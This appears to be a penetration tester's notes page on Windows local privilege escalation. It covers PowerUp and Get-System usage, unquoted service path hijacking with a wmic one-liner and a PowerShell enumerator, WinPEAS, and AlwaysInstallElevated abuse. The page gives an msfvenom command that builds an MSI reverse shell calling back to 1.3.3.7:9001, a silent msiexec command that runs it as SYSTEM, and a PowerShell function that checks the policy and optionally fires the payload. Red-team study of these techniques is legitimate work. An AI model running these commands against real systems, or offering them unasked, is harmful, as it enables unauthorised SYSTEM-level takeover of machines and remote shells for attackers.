Pentesting & Red Teaming Notes
Privilege Escalation

Last updated 3 years ago

PowerShellMafia

Always use the dev branch (it carries the most recent PowerView and PowerUp). PowerView (Recon) has useful functions for domain enumeration; PowerUp (Privesc) runs the common local privilege escalation checks, and Get-System.ps1 spawns a SYSTEM shell once you are a local administrator:

powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks"
powershell.exe -c "Import-Module C:\Users\Public\Get-System.ps1; Get-System"

Unquoted Service Paths

Suppose a service is registered with the following binary path, which contains spaces but is not wrapped in quotes.

C:\Program Files\IObit\Advanced SystemCare\ASCService.exe

Because the path is unquoted, Windows cannot tell where the executable ends and its arguments begin, so CreateProcess tries the following candidates in order until one exists:

  • C:\Program.exe

  • C:\Program Files\IObit\Advanced.exe

  • C:\Program Files\IObit\Advanced SystemCare\ASCService.exe

If we can write a binary to one of the earlier candidate locations (C:\Program.exe or C:\Program Files\IObit\Advanced.exe), the service starts our binary instead of the real one, under the service's account.

  • The planted binary only runs when the service starts, so we need to be able to restart the service (or reboot the machine), or wait for an Auto-start service to come up after the next reboot. Otherwise the finding is of little use.

  • The service must run as a more privileged account than ours (typically LocalSystem) for this to be an elevation; check the "Log On As" account before spending time on it.

  • By default a standard user can create folders but not files directly under C:\, so C:\Program.exe is usually a false positive; the useful cases are the deeper candidates inside vendor directories with loose permissions.

Enumerating unquoted service paths (auto-start services outside C:\Windows whose path contains no quote character):

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
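As an added example (not from the original notes, PowerSploit or PEASS), the same enumeration in PowerShell: it reads Win32_Service via CIM (so it also works on builds where wmic.exe has been removed), derives the candidate hijack paths the same way CreateProcess does, and probes each candidate's directory for write access. The function names and the filtering at the end are my own choices.

```powershell
# Added example, not part of the original notes. Function names are the editor's own.

function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Path)
    # Reading ACLs is error-prone (deny ACEs, nested groups, inheritance), so the
    # reliable test is to try to create and delete a file in the directory.
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path -Path $Path -ChildPath ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    }
    catch {
        return $false
    }
}

function Get-UnquotedServicePath {
    # Emits one object per hijack candidate: which service, who it runs as, whether it
    # starts automatically, and whether we can drop a file where it would be picked up.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc  = $_
        $path = $svc.PathName
        if ([string]::IsNullOrWhiteSpace($path)) { return }   # 'return' here skips just this service
        if ($path.StartsWith('"'))                { return }   # properly quoted
        if ($path -match '^[a-z]:\\windows\\')    { return }   # the OS's own services

        # Everything up to the first ".exe" is the executable; arguments after it are irrelevant.
        $exe = if ($path -match '^(?<exe>.+?\.exe)') { $Matches['exe'] } else { $path }
        if ($exe -notmatch ' ') { return }                     # no space, no ambiguity

        # CreateProcess tries each space-delimited prefix with ".exe" appended before the
        # real binary: "C:\Program Files\X Y\svc.exe" -> C:\Program.exe, C:\Program Files\X.exe
        $parts = $exe -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            [PSCustomObject]@{
                Service     = $svc.Name
                RunsAs      = $svc.StartName
                StartMode   = $svc.StartMode
                ImagePath   = $path
                Candidate   = $candidate
                DirWritable = Test-DirectoryWritable -Path (Split-Path -Path $candidate -Parent)
            }
        }
    }
}

# Only the rows worth acting on: auto-start, privileged account, writable target directory.
Get-UnquotedServicePath |
    Where-Object { $_.DirWritable -and $_.StartMode -eq 'Auto' -and $_.RunsAs -match 'LocalSystem' } |
    Format-Table -AutoSize
```

Drop the Where-Object filter to see every candidate, including ones that are writable but belong to Manual-start services, which are still worth noting if you can trigger the service some other way.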

WinPeas

It is a great privilege escalation enumeration tool. Download the binary from the releases page linked below and simply execute it; notcolor disables ANSI colouring (useful over a plain reverse shell) and quiet suppresses the banner.

.\winPEASx64_ofs.exe notcolor quiet

Seatbelt

Always Install Elevated

Detecting whether the policy is enabled:

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

If AlwaysInstallElevated is enabled, both queries return an AlwaysInstallElevated REG_DWORD with value 0x1. The policy only takes effect when it is set in both the machine (HKLM) and the user (HKCU) key; if either key is missing or the value is 0, msiexec does not install with elevated privileges.

Exploiting it is simple. Generate an MSI payload (and start a matching handler first, since windows/shell/reverse_tcp is a staged payload):

msfvenom -p windows/shell/reverse_tcp lhost=1.3.3.7 lport=9001 -f msi > shell.msi

Copy it to the target and execute it. The installer runs as SYSTEM, so the shell comes back with SYSTEM privileges:

msiexec /quiet /qn /i shell.msi
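The check and the exploitation step above as one PowerShell function, added here as an example (not from the original notes or the linked article). It encodes the rule that both keys must be 1, treats a missing key or value as "not enabled" instead of an error, and optionally fires the MSI when the box is vulnerable. The function name and the -MsiPath parameter are my own.

```powershell
# Added example, not part of the original notes. Function name is the editor's own.

function Test-AlwaysInstallElevated {
    param(
        # Optional: path to an MSI to run if the policy is enabled (e.g. the msfvenom package above).
        [string]$MsiPath
    )

    # msiexec honours the policy only when BOTH values are 1, so check the machine and user keys.
    # Get-ItemProperty with SilentlyContinue returns $null for a missing key, and a missing
    # value reads as $null, so "not present" simply evaluates as "not enabled".
    $keys = @{
        Machine = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
        User    = 'HKCU:\Software\Policies\Microsoft\Windows\Installer'
    }
    $enabled = @{}
    foreach ($scope in $keys.Keys) {
        $item = Get-ItemProperty -Path $keys[$scope] -ErrorAction SilentlyContinue
        $enabled[$scope] = ($null -ne $item -and $item.AlwaysInstallElevated -eq 1)
    }

    $result = [PSCustomObject]@{
        MachinePolicy = $enabled.Machine
        UserPolicy    = $enabled.User
        Vulnerable    = ($enabled.Machine -and $enabled.User)
    }

    if ($result.Vulnerable -and $MsiPath) {
        # The Windows Installer service runs the package as SYSTEM, so whatever the MSI
        # launches inherits that token. Start the handler for the payload before this point.
        Start-Process -FilePath msiexec.exe -ArgumentList "/i `"$MsiPath`" /quiet /qn" -Wait
    }
    return $result
}

Test-AlwaysInstallElevated                                      # report only
# Test-AlwaysInstallElevated -MsiPath C:\Users\Public\shell.msi  # report and fire the payload
```

Run the report form first: if only one of MachinePolicy or UserPolicy is true, the policy is misconfigured but not exploitable this way, and there is no point pushing a payload to the host.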

https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Privesc/PowerUp.ps1
https://github.com/carlospolop/PEASS-ng/releases
https://github.com/GhostPack/Seatbelt
https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/